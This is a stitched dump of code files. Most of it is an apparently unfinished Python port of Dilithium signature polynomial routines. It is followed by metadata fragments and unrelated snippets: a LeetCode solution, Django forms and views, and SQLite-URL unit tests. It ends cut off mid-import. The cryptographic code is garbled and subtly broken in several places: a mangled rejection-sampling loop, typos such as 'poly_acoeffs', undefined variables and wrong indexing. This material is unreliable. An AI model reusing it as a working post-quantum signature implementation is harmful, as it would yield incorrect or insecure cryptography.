polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_cadq(poly_a):\r\n for i in range(N):\r\n poly_a.poly.coeffs[i] = caddq(poly_a.poly.coeffs[i])\r\n \r\n \r\n \r\n\"\"\"/*************************************************\r\n* Name: poly_freeze\r\n*\r\n* Description: Inplace reduction of all coefficients of polynomial to\r\n* standard representatives.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/ \"\"\"\r\n\r\n\r\ndef poly_freeze(poly_a):\r\n for i in range (N):\r\n poly_a.coeffs[i] = freeze(poly_a.coeffs[i])\r\n \r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_add\r\n*\r\n* Description: Add polynomials. No modular reduction is performed.\r\n*\r\n* Arguments: - poly *c: pointer to output polynomial\r\n* - const poly *a: pointer to first summand\r\n* - const poly *b: pointer to second summand\r\n**************************************************/\"\"\"\r\n\r\ndef poly_add(poly_c, poly_a, poly_b):\r\n for i in range(N):\r\n poly_c.coeffs[i] = poly_a.coeffs[i] + poly_b.coeffs[i]\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_sub\r\n*\r\n* Description: Subtract polynomials. 
No modular reduction is\r\n* performed.\r\n*\r\n* Arguments: - poly *c: pointer to output polynomial\r\n* - const poly *a: pointer to first input polynomial\r\n* - const poly *b: pointer to second input polynomial to be\r\n* subtraced from first i\"\"\" \r\n\r\ndef poly_sub(poly_c, poly_a, poly_b):\r\n for i in range(N):\r\n poly_c.coeffs[i] = poly_a.coeffs[i] - poly_b.coeffs[i]\r\n\r\n\r\n\"\"\" /*************************************************\r\n* Name: poly_shiftl\r\n*\r\n* Description: Multiply polynomial by 2^D without modular reduction. Assumes\r\n* input coefficients to be less than 2^{31-D} in absolute value.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_shiftl(poly_a):\r\n for i in range (N):\r\n poly_a.coeffs[i] <<=D\r\n \r\n \r\n\"\"\"/*************************************************\r\n* Name: poly_ntt\r\n*\r\n* Description: Inplace forward NTT. Coefficients can grow by\r\n* 8*Q in absolute value.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_ntt(poly_a):\r\n ntt(poly_a.coeffs)\r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_invntt_tomont\r\n*\r\n* Description: Inplace inverse NTT and multiplication by 2^{32}.\r\n* Input coefficients need to be less than Q in absolute\r\n* value and output coefficients are again bounded by Q.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_invntt_tomont(poly_a):\r\n invntt_tomont(poly_acoeffs)\r\n \r\n\"\"\"/*************************************************\r\n* Name: poly_pointwise_montgomery\r\n*\r\n* Description: Pointwise multiplication of polynomials in NTT domain\r\n* representation and multiplication of resulting polynomial\r\n* by 2^{-32}.\r\n*\r\n* Arguments: - poly *c: pointer to output polynomial\r\n* - const poly *a: pointer to first input polynomial\r\n* - const poly *b: pointer to second input polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_pointwise_montgomery(poly_c, poly_a, poly_b):\r\n for i in range (N):\r\n poly_c.coeffs[i] = montgomery_reduce(poly_a.coeffs[i]*poly_b.coeffs[i])\r\n \r\n \r\n\"\"\"/*************************************************\r\n* Name: poly_power2round\r\n*\r\n* Description: For all coefficients c of the input polynomial,\r\n* compute c0, c1 such that c mod Q = c1*2^D + c0\r\n* with -2^{D-1} < c0 <= 2^{D-1}. 
Assumes coefficients to be\r\n* standard representatives.\r\n*\r\n* Arguments: - poly *a1: pointer to output polynomial with coefficients c1\r\n* - poly *a0: pointer to output polynomial with coefficients c0\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_power2round(poly_a1,poly_a0,poly_a):\r\n for i in range(N):\r\n poly_a1.coeffs[i] = power2round(poly_a0.coeffs[i], poly_a.coeffs[i])\r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_decompose\r\n*\r\n* Description: For all coefficients c of the input polynomial,\r\n* compute high and low bits c0, c1 such c mod Q = c1*ALPHA + c0\r\n* with -ALPHA/2 < c0 <= ALPHA/2 except c1 = (Q-1)/ALPHA where we\r\n* set c1 = 0 and -ALPHA/2 <= c0 = c mod Q - Q < 0.\r\n* Assumes coefficients to be standard representatives.\r\n*\r\n* Arguments: - poly *a1: pointer to output polynomial with coefficients c1\r\n* - poly *a0: pointer to output polynomial with coefficients c0\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\" \r\n \r\ndef poly_decompose(poly_a1,poly_a0,poly_a):\r\n for i in range(N):\r\n poly_a1.coeffs[i] = decompose(poly_a0.coeffs[i], poly_a.coeffs[i])\r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_make_hint\r\n*\r\n* Description: Compute hint polynomial. The coefficients of which indicate\r\n* whether the low bits of the corresponding coefficient of\r\n* the input polynomial overflow into the high bits.\r\n*\r\n* Arguments: - poly *h: pointer to output hint polynomial\r\n* - const poly *a0: pointer to low part of input polynomial\r\n* - const poly *a1: pointer to high part of input polynomial\r\n*\r\n* Returns number of 1 bits.\r\n**************************************************/\"\"\"\r\n \r\ndef poly_make_hint(poly_h,poly_a0, poly_a1):\r\n for i in range(N):\r\n poly_h.coeffs[i] = make_hint(poly_a0.coeffs[i], poly_a1.coeffs[i])\r\n s += poly_h.coeffs[i]\r\n return s\r\n\r\n\"\"\" /*************************************************\r\n* Name: poly_use_hint\r\n*\r\n* Description: Use hint polynomial to correct the high bits of a polynomial.\r\n*\r\n* Arguments: - poly *b: pointer to output polynomial with corrected high bits\r\n* - const poly *a: pointer to input polynomial\r\n* - const poly *h: pointer to input hint polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_use_hint(poly_b,poly_a,poly_h):\r\n for i in range(N):\r\n poly_b.coeffs[i] = use_hint(poly_a.coeffs[i], poly_h.coeffs[i])\r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_chknorm\r\n*\r\n* Description: Check infinity norm of polynomial against given bound.\r\n* Assumes input coefficients were reduced by reduce32().\r\n*\r\n* Arguments: - const poly *a: pointer to polynomial\r\n* - int32_t B: norm bound\r\n*\r\n* Returns 0 if norm is strictly smaller than B <= (Q-1)/8 and 1 otherwise.\r\n**************************************************/\"\"\"\r\n \r\ndef poly_chknorm(poly_a,B):\r\n \r\n if(B> (Q-1)/8):\r\n return 1\r\n \r\n for i in range (N):\r\n t = poly_a.coeffs[i] >> 31\r\n t = poly_a.coeffs[i] - (t & 2*poly_a.coeffs[i])\r\n \r\n if(t >=B):\r\n return 1\r\n \r\n \r\n return 0\r\n\r\n\r\n\"\"\" /*************************************************\r\n* Name: rej_uniform\r\n*\r\n* Description: Sample uniformly random coefficients in [0, Q-1] by\r\n* performing rejection sampling on array of random 
bytes.\r\n*\r\n* Arguments: - int32_t *a: pointer to output array (allocated)\r\n* - unsigned int len: number of coefficients to be sampled\r\n* - const uint8_t *buf: array of random bytes\r\n* - unsigned int buflen: length of array of random bytes\r\n*\r\n* Returns number of sampled coefficients. Can be smaller than len if not enough\r\n* random bytes were given.\r\n**************************************************/\"\"\"\r\n\r\ndef rej_uniform(a,leng, buf, buflen):\r\n \r\n ctr = pos = 0\r\n while(ctr < len and pos+3 <= buflen):\r\n pos+=1\r\n t = buf[pos]\r\n pos+=1\r\n t |= buf[pos] << 8\r\n pos+=1\r\n t |= buf[pos] << 16\r\n \r\n if (t < Q):\r\n ctr += 1\r\n a[ctr+1] = t\r\n \r\n return ctr\r\n\r\n\"\"\" /*************************************************\r\n* Name: poly_uniform\r\n*\r\n* Description: Sample polynomial with uniformly random coefficients\r\n* in [0,Q-1] by performing rejection sampling on the\r\n* output stream of SHAKE256(seed|nonce) or AES256CTR(seed,nonce).\r\n*\r\n* Arguments: - poly *a: pointer to output polynomial\r\n* - const uint8_t seed[]: byte array with seed of length SEEDBYTES\r\n* - uint16_t nonce: 2-byte nonce\r\n**************************************************/\"\"\"\r\nSTREAM128_BLOCKBYTES = SHAKE128_RATE\r\nPOLY_UNIFORM_NBLOCKS = ((768 + STREAM128_BLOCKBYTES - 1)/STREAM128_BLOCKBYTES)\r\n\r\n# implementation required!!!\r\n\"\"\"def poly_uniform(poly_a,seed,nonce):\r\n buflen = POLY_UNIFORM_NBLOCKS*STREAM128_BLOCKBYTES\r\n bufarray= array.array('i',(0 for i in range(0,POLY_UNIFORM_NBLOCKS*STREAM128_BLOCKBYTES+2)))\r\n \r\n state = SHAKE128(seed,nonce)\r\n\"\"\" \r\n \r\n \r\n#-------\r\n\r\n\r\n \r\n\"\"\" /*************************************************\r\n* Name: rej_eta\r\n*\r\n* Description: Sample uniformly random coefficients in [-ETA, ETA] by\r\n* performing rejection sampling on array of random bytes.\r\n*\r\n* Arguments: - int32_t *a: pointer to output array (allocated)\r\n* - unsigned int len: number of coefficients to be sampled\r\n* - const uint8_t *buf: array of random bytes\r\n* - unsigned int buflen: length of array of random bytes\r\n*\r\n* Returns number of sampled coefficients. 
Can be smaller than len if not enough\r\n* random bytes were given.\r\n**************************************************/\"\"\"\r\n\r\n\r\ndef rej_eta(a,leng,buf,buflen):\r\n ctr = pos = 0\r\n while (ctr> 4\r\n if ETA==2:\r\n if(t0<15):\r\n t0 = t0- (205*t0 >> 10)*5\r\n if(t1<15 and ctr> 10)*5\r\n a[ctr+1] = 2-t1\r\n elif ETA==4:\r\n if t0<9:\r\n a[ctr+1] = 4-t0\r\n if t1<9 and ctri:\r\n pos+=1\r\n b = buf[pos]\r\n c.coeffs[i] = c.coeffs[b]\r\n c.coeffs[b] = 1 - 2*(signs&1)\r\n signs >>= 1\r\n i+=1\r\n \r\n\r\n\"\"\" /*************************************************\r\n* Name: polyeta_pack\r\n*\r\n* Description: Bit-pack polynomial with coefficients in [-ETA,ETA].\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYETA_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\n\r\ndef polyeta_pack(r, poly_a):\r\n \r\n if ETA == 2:\r\n for i in range (N/8):\r\n t[0] = ETA - a.coeffs[8*i+0]\r\n t[1] = ETA - a.coeffs[8*i+1]\r\n t[2] = ETA - a.coeffs[8*i+2]\r\n t[3] = ETA - a.coeffs[8*i+3]\r\n t[4] = ETA - a.coeffs[8*i+4]\r\n t[5] = ETA - a.coeffs[8*i+5]\r\n t[6] = ETA - a.coeffs[8*i+6]\r\n t[7] = ETA - a.coeffs[8*i+7]\r\n \r\n r[3*i+0] = (t[0] >> 0) | (t[1] << 3) | (t[2] << 6)\r\n r[3*i+1] = (t[2] >> 2) | (t[3] << 1) | (t[4] << 4) | (t[5] << 7)\r\n r[3*i+2] = (t[5] >> 1) | (t[6] << 2) | (t[7] << 5)\r\n\r\n elif ETA == 4:\r\n for i in range (N/2):\r\n t[0] = ETA - a.coeffs[2*i+0]\r\n t[1] = ETA - a.coeffs[2*i+1]\r\n r[i] = t[0] | (t[1] << 4)\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: polyeta_unpack\r\n*\r\n* Description: Unpack polynomial with coefficients in [-ETA,ETA].\r\n*\r\n* Arguments: - poly *r: pointer to output polynomial\r\n* - const uint8_t *a: byte array with bit-packed polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyeta_unpack(poly_r, a):\r\n \r\n if ETA == 2:\r\n for i in range (N/8): \r\n r.coeffs[8*i+0] = (a[3*i+0] >> 0) & 7\r\n r.coeffs[8*i+1] = (a[3*i+0] >> 3) & 7\r\n r.coeffs[8*i+2] = ((a[3*i+0] >> 6) | (a[3*i+1] << 2)) & 7\r\n r.coeffs[8*i+3] = (a[3*i+1] >> 1) & 7\r\n r.coeffs[8*i+4] = (a[3*i+1] >> 4) & 7\r\n r.coeffs[8*i+5] = ((a[3*i+1] >> 7) | (a[3*i+2] << 1)) & 7\r\n r.coeffs[8*i+6] = (a[3*i+2] >> 2) & 7\r\n r.coeffs[8*i+7] = (a[3*i+2] >> 5) & 7\r\n\r\n r.coeffs[8*i+0] = ETA - r.coeffs[8*i+0]\r\n r.coeffs[8*i+1] = ETA - r.coeffs[8*i+1]\r\n r.coeffs[8*i+2] = ETA - r.coeffs[8*i+2]\r\n r.coeffs[8*i+3] = ETA - r.coeffs[8*i+3]\r\n r.coeffs[8*i+4] = ETA - r.coeffs[8*i+4]\r\n r.coeffs[8*i+5] = ETA - r.coeffs[8*i+5]\r\n r.coeffs[8*i+6] = ETA - r.coeffs[8*i+6]\r\n r.coeffs[8*i+7] = ETA - r.coeffs[8*i+7]\r\n \r\n \r\n elif ETA == 4:\r\n for i in range (N/2):\r\n r.coeffs[2*i+0] = a[1] & 0x0F\r\n r.coeffs[2*i+1] = a[i] >> 4\r\n r.coeffs[2*i] = ETA - r.coeffs[2*i]\r\n r.coeffs[2*i+1] = ETA - r.coeffs[2*i+1]\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: polyt1_pack\r\n*\r\n* Description: Bit-pack polynomial t1 with coefficients fitting in 10 bits.\r\n* Input coefficients are assumed to be standard representatives.\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYT1_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\n \r\ndef polyt1_pack(r,poly_a):\r\n \r\n for i in range (N/4):\r\n r[5*i+0] = (a.coeffs[4*i+0] >> 0)\r\n r[5*i+1] = 
(a.coeffs[4*i+0] >> 8) | (a.coeffs[4*i+1] << 2)\r\n r[5*i+2] = (a.coeffs[4*i+1] >> 6) | (a.coeffs[4*i+2] << 4)\r\n r[5*i+3] = (a.coeffs[4*i+2] >> 4) | (a.coeffs[4*i+3] << 6)\r\n r[5*i+4] = (a.coeffs[4*i+3] >> 2)\r\n \r\n\r\n\"\"\" /*************************************************\r\n* Name: polyt1_unpack\r\n*\r\n* Description: Unpack polynomial t1 with 10-bit coefficients.\r\n* Output coefficients are standard representatives.\r\n*\r\n* Arguments: - poly *r: pointer to output polynomial\r\n* - const uint8_t *a: byte array with bit-packed polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyt1_unpack(poly_r, a):\r\n \r\n for i in range (N/4):\r\n r.coeffs[4*i+0] = ((a[5*i+0] >> 0) | (a[5*i+1] << 8)) & 0x3FF\r\n r.coeffs[4*i+1] = ((a[5*i+1] >> 2) | (a[5*i+2] << 6)) & 0x3FF\r\n r.coeffs[4*i+2] = ((a[5*i+2] >> 4) | (a[5*i+3] << 4)) & 0x3FF\r\n r.coeffs[4*i+3] = ((a[5*i+3] >> 6) | (a[5*i+4] << 2)) & 0x3FF\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: polyt0_pack\r\n*\r\n* Description: Bit-pack polynomial t0 with coefficients in ]-2^{D-1}, 2^{D-1}].\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYT0_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\ndef polyt0_pack(r,poly_a):\r\n \r\n for i in range (N/8):\r\n t[0] = (1 << (D-1)) - a.coeffs[8*i+0]\r\n t[1] = (1 << (D-1)) - a.coeffs[8*i+1]\r\n t[2] = (1 << (D-1)) - a.coeffs[8*i+2]\r\n t[3] = (1 << (D-1)) - a.coeffs[8*i+3]\r\n t[4] = (1 << (D-1)) - a.coeffs[8*i+4]\r\n t[5] = (1 << (D-1)) - a.coeffs[8*i+5]\r\n t[6] = (1 << (D-1)) - a.coeffs[8*i+6]\r\n t[7] = (1 << (D-1)) - a.coeffs[8*i+7]\r\n \r\n r[13*i+ 0] = t[0]\r\n r[13*i+ 1] = t[0] >> 8\r\n r[13*i+ 1] |= t[1] << 5\r\n r[13*i+ 2] = t[1] >> 3\r\n r[13*i+ 3] = t[1] >> 11\r\n r[13*i+ 3] |= t[2] << 2\r\n r[13*i+ 4] = t[2] >> 6\r\n r[13*i+ 4] |= t[3] << 7\r\n r[13*i+ 5] = t[3] >> 1\r\n r[13*i+ 6] = t[3] >> 9\r\n r[13*i+ 6] |= t[4] << 4\r\n r[13*i+ 7] = t[4] >> 4\r\n r[13*i+ 8] = t[4] >> 12\r\n r[13*i+ 8] |= t[5] << 1\r\n r[13*i+ 9] = t[5] >> 7\r\n r[13*i+ 9] |= t[6] << 6\r\n r[13*i+10] = t[6] >> 2\r\n r[13*i+11] = t[6] >> 10\r\n r[13*i+11] |= t[7] << 3\r\n r[13*i+12] = t[7] >> 5\r\n\r\n\"\"\" /*************************************************\r\n* Name: polyt0_unpack\r\n*\r\n* Description: Unpack polynomial t0 with coefficients in ]-2^{D-1}, 2^{D-1}].\r\n*\r\n* Arguments: - poly *r: pointer to output polynomial\r\n* - const uint8_t *a: byte array with bit-packed polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyt0_unpack(poly_r, a):\r\n for i in range (N/8):\r\n r.coeffs[8*i+0] = a[13*i+0]\r\n r.coeffs[8*i+0] |= a[13*i+1] << 8\r\n r.coeffs[8*i+0] &= 0x1FFF\r\n\r\n r.coeffs[8*i+1] = a[13*i+1] >> 5\r\n r.coeffs[8*i+1] |= a[13*i+2] << 3\r\n r.coeffs[8*i+1] |= a[13*i+3] << 11\r\n r.coeffs[8*i+1] &= 0x1FFF\r\n\r\n r.coeffs[8*i+2] = a[13*i+3] >> 2\r\n r.coeffs[8*i+2] |= a[13*i+4] << 6\r\n r.coeffs[8*i+2] &= 0x1FFF\r\n\r\n r.coeffs[8*i+3] = a[13*i+4] >> 7\r\n r.coeffs[8*i+3] |= a[13*i+5] << 1\r\n r.coeffs[8*i+3] |= a[13*i+6] << 9\r\n r.coeffs[8*i+3] &= 0x1FFF\r\n\r\n r.coeffs[8*i+4] = a[13*i+6] >> 4\r\n r.coeffs[8*i+4] |= a[13*i+7] << 4\r\n r.coeffs[8*i+4] |= a[13*i+8] << 12\r\n r.coeffs[8*i+4] &= 0x1FFF\r\n\r\n r.coeffs[8*i+5] = a[13*i+8] >> 1\r\n r.coeffs[8*i+5] |= a[13*i+9] << 7\r\n r.coeffs[8*i+5] &= 0x1FFF\r\n \r\n r.coeffs[8*i+6] = a[13*i+9] >> 6\r\n r.coeffs[8*i+6] |= 
a[13*i+10] << 2\r\n r.coeffs[8*i+6] |= a[13*i+11] << 10\r\n r.coeffs[8*i+6] &= 0x1FFF\r\n\r\n r.coeffs[8*i+7] = a[13*i+11] >> 3\r\n r.coeffs[8*i+7] |= a[13*i+12] << 5\r\n r.coeffs[8*i+7] &= 0x1FFF\r\n\r\n r.coeffs[8*i+0] = (1 << (D-1)) - r.coeffs[8*i+0]\r\n r.coeffs[8*i+1] = (1 << (D-1)) - r.coeffs[8*i+1]\r\n r.coeffs[8*i+2] = (1 << (D-1)) - r.coeffs[8*i+2]\r\n r.coeffs[8*i+3] = (1 << (D-1)) - r.coeffs[8*i+3]\r\n r.coeffs[8*i+4] = (1 << (D-1)) - r.coeffs[8*i+4]\r\n r.coeffs[8*i+5] = (1 << (D-1)) - r.coeffs[8*i+5]\r\n r.coeffs[8*i+6] = (1 << (D-1)) - r.coeffs[8*i+6]\r\n r.coeffs[8*i+7] = (1 << (D-1)) - r.coeffs[8*i+7]\r\n \r\n\r\n\"\"\" /*************************************************\r\n* Name: polyz_pack\r\n*\r\n* Description: Bit-pack polynomial with coefficients\r\n* in [-(GAMMA1 - 1), GAMMA1].\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYZ_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyz_pack(r, poly_a):\r\n \r\n if GAMMA1 == (1<<17):\r\n for i in range (N/4):\r\n t[0] = GAMMA1 - a.coeffs[4*i+0]\r\n t[1] = GAMMA1 - a.coeffs[4*i+1]\r\n t[2] = GAMMA1 - a.coeffs[4*i+2]\r\n t[3] = GAMMA1 - a.coeffs[4*i+3]\r\n \r\n r[9*i+0] = t[0]\r\n r[9*i+1] = t[0] >> 8\r\n r[9*i+2] = t[0] >> 16\r\n r[9*i+2] |= t[1] << 2\r\n r[9*i+3] = t[1] >> 6\r\n r[9*i+4] = t[1] >> 14\r\n r[9*i+4] |= t[2] << 4\r\n r[9*i+5] = t[2] >> 4\r\n r[9*i+6] = t[2] >> 12\r\n r[9*i+6] |= t[3] << 6\r\n r[9*i+7] = t[3] >> 2\r\n r[9*i+8] = t[3] >> 10 \r\n\r\n elif GAMMA1 == (1<<19):\r\n for i in range (N/2):\r\n t[0] = GAMMA1 - a.coeffs[2*i+0]\r\n t[1] = GAMMA1 - a.coeffs[2*i+1]\r\n \r\n r[5*i+0] = t[0]\r\n r[5*i+1] = t[0] >> 8\r\n r[5*i+2] = t[0] >> 16\r\n r[5*i+2] |= t[1] << 4\r\n r[5*i+3] = t[1] >> 4\r\n r[5*i+4] = t[1] >> 12\r\n\r\n\r\n\"\"\" /*************************************************\r\n* Name: polyz_unpack\r\n*\r\n* Description: Unpack polynomial z with coefficients\r\n* in [-(GAMMA1 - 1), GAMMA1].\r\n*\r\n* Arguments: - poly *r: pointer to output polynomial\r\n* - const uint8_t *a: byte array with bit-packed polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyz_unpack(poly_r, a):\r\n \r\n if GAMMA1 == (1<<17):\r\n for i in range (N/4):\r\n r.coeffs[4*i+0] = a[9*i+0]\r\n r.coeffs[4*i+0] |= a[9*i+1] << 8\r\n r.coeffs[4*i+0] |= a[9*i+2] << 16\r\n r.coeffs[4*i+0] &= 0x3FFFF\r\n \r\n r.coeffs[4*i+1] = a[9*i+2] >> 2\r\n r.coeffs[4*i+1] |= a[9*i+3] << 6\r\n r.coeffs[4*i+1] |= a[9*i+4] << 14\r\n r.coeffs[4*i+1] &= 0x3FFFF\r\n \r\n r.coeffs[4*i+2] = a[9*i+4] >> 4\r\n r.coeffs[4*i+2] |= a[9*i+5] << 4\r\n r.coeffs[4*i+2] |= a[9*i+6] << 12\r\n r.coeffs[4*i+2] &= 0x3FFFF\r\n \r\n r.coeffs[4*i+3] = a[9*i+6] >> 6\r\n r.coeffs[4*i+3] |= a[9*i+7] << 2\r\n r.coeffs[4*i+3] |= a[9*i+8] << 10\r\n r.coeffs[4*i+3] &= 0x3FFFF\r\n \r\n r.coeffs[4*i+0] = GAMMA1 - r.coeffs[4*i+0]\r\n r.coeffs[4*i+1] = GAMMA1 - r.coeffs[4*i+1]\r\n r.coeffs[4*i+2] = GAMMA1 - r.coeffs[4*i+2]\r\n r.coeffs[4*i+3] = GAMMA1 - r.coeffs[4*i+3]\r\n\r\n\r\n elif GAMMA1 == (1<<19):\r\n for i in range (N/2):\r\n r.coeffs[2*i+0] = a[5*i+0]\r\n r.coeffs[2*i+0] |= a[5*i+1] << 8\r\n r.coeffs[2*i+0] |= a[5*i+2] << 16\r\n r.coeffs[2*i+0] &= 0xFFFFF\r\n \r\n r.coeffs[2*i+1] = a[5*i+2] >> 4\r\n r.coeffs[2*i+1] |= a[5*i+3] << 4\r\n r.coeffs[2*i+1] |= a[5*i+4] << 12\r\n r.coeffs[2*i+0] &= 0xFFFFF\r\n \r\n r.coeffs[2*i+0] = GAMMA1 - r.coeffs[2*i+0]\r\n r.coeffs[2*i+1] = GAMMA1 - r.coeffs[2*i+1]\r\n\r\n\r\n\"\"\" 
/*************************************************\r\n* Name: polyw1_pack\r\n*\r\n* Description: Bit-pack polynomial w1 with coefficients in [0,15] or [0,43].\r\n* Input coefficients are assumed to be standard representatives.\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYW1_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyw1_pack(r,poly_a):\r\n if GAMMA2 == (Q-1)/88:\r\n for i in range (N/4):\r\n r[3*i+0] = a.coeffs[4*i+0]\r\n r[3*i+0] |= a.coeffs[4*i+1] << 6\r\n r[3*i+1] = a.coeffs[4*i+1] >> 2\r\n r[3*i+1] |= a.coeffs[4*i+2] << 4\r\n r[3*i+2] = a.coeffs[4*i+2] >> 4\r\n r[3*i+2] |= a.coeffs[4*i+3] << 2\r\n \r\n elif GAMMA2 == (Q-1)/32:\r\n for i in range (N/2):\r\n r[i] = a.coeffs[2*i+0] | (a.coeffs[2*i+1] << 4); \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bilgehanertan/PQC-Dilithium-Python-Implementation","sub_path":"Libraries/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":26596,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"1696228735","text":"\"\"\"SQLite Intake Catalog unit tests.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom pathlib import Path\n\nimport pytest\n\nfrom intake_sqlite import urlpath_to_sqliteurl\n\nlogger = logging.getLogger(__name__)\n\nDATA_DIR = Path(__file__).resolve().parents[1] / \"data\"\n\nBAD_FILES: list[tuple[str, type[Exception]]] = [\n (\"database.wtf\", ValueError),\n (\"dbdump.sql\", ValueError),\n (\"nonexistent.db\", ValueError),\n (\"nonexistent.sqlite\", ValueError),\n]\n\nBAD_URLS: list[tuple[str, type[Exception]]] = [\n (\"https://catalyst.coop/pudl.wtf\", ValueError),\n (\"s3://catalyst.coop/pudl.dude\", ValueError),\n (\"gs://catalyst.coop/pudl.sql\", ValueError),\n (\"wtftp://catalyst.coop/pudl.sqlite\", ValueError),\n (\"wtftp://catalyst.coop/pudl.db\", ValueError),\n]\n\n\n@pytest.mark.parametrize(\"filename,exc\", BAD_FILES)\ndef test_bad_filenames(filename: str, exc: type[Exception], tmp_path: Path) -> None:\n \"\"\"Test for failure on bad or non-existent files.\"\"\"\n urlpath = tmp_path / filename\n with pytest.raises(exc):\n urlpath_to_sqliteurl(str(urlpath))\n\n\n@pytest.mark.parametrize(\"dirname,exc\", BAD_FILES)\ndef test_bad_dirnames(dirname: str, exc: type[Exception], tmp_path: Path) -> None:\n \"\"\"Test for failure when path points to a directory, not a file.\"\"\"\n urlpath = tmp_path / dirname\n urlpath.mkdir()\n with pytest.raises(exc):\n urlpath_to_sqliteurl(str(urlpath))\n\n\n@pytest.mark.parametrize(\"url,exc\", BAD_URLS)\ndef test_bad_urls(url: str, exc: type[Exception]) -> None:\n \"\"\"Test for failure when we get a bad URL.\"\"\"\n with pytest.raises(exc):\n urlpath_to_sqliteurl(url)\n\n\ndef test_local_path_to_sqliteurl() -> None:\n \"\"\"Test our transformation of paths/URLs into SQL Alchemy URLs.\"\"\"\n expected_local_url = f\"sqlite:///{DATA_DIR / 'test.db'}\"\n test_db_path = DATA_DIR / \"test.db\"\n actual_local_url = urlpath_to_sqliteurl(str(test_db_path))\n assert actual_local_url == expected_local_url # nosec: B101\n\n\n# Note: There's no remote URL unit test for a working input to urlpath_to_sqliteurl()\n# because it's exercised in the integration tests, and there's no way to know what the\n# local path to the cached file will be since it uses a hash (of the URL?) 
as the\n# filename.\n","repo_name":"catalyst-cooperative/intake-sqlite","sub_path":"tests/unit/intake_sqlite_test.py","file_name":"intake_sqlite_test.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"24491498554","text":"#\n# @lc app=leetcode.cn id=557 lang=python3\n#\n# [557] 反转字符串中的单词 III\n#\n\n# @lc code=start\nclass Solution:\n def reverseWords(self, s: str) -> str:\n ans,t='',''\n for c in s:\n if c==' ':\n ans+=t+' '\n t=''\n else:\n t=c+t\n if t!='':\n ans+=t\n return ans\n# @lc code=end\n\n","repo_name":"zerubbabel/leetcode","sub_path":"557.反转字符串中的单词-iii.py","file_name":"557.反转字符串中的单词-iii.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32931559168","text":"from django.forms import Form, ModelForm\nfrom randomchampion.champdatabase.models import Champion, Role\nfrom django import forms\n\nclass ChampionForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Champion\n\nclass ChooseChampionForm(forms.Form):\n\tROLE_CHOICES = (\n\t\t('all','All'),\n\t\t('jungler','Jungler'),\n\t\t('top','Top'),\n\t\t('mid','Mid'),\n\t\t('marksman','Marksman'),\n\t\t('support','Support')\n\t\t)\n\n\trole = forms.MultipleChoiceField(widget = forms.CheckboxSelectMultiple, choices = ROLE_CHOICES)","repo_name":"charmelonlai/lolrandomizer","sub_path":"randomchampion/champdatabase/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35502930233","text":"from django.shortcuts import render\n\nfrom .models import about\nfrom .models import slider\nfrom .models import client\n\ndef home(request):\n aboutData=about.objects.all()[0]\n sliderData=slider.objects.all()\n clientData=client.objects.all()\n context={\n 'about':aboutData,\n 'slider':sliderData,\n 'client':clientData\n }\n return render(request,'index.html',context)\n\ndef aboutus(request):\n return render(request,'about.html')\n\n\n","repo_name":"sharif7761/django_blog_web","sub_path":"index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72067628587","text":"import pandas as pd\nfrom multiprocessing import Process\nimport 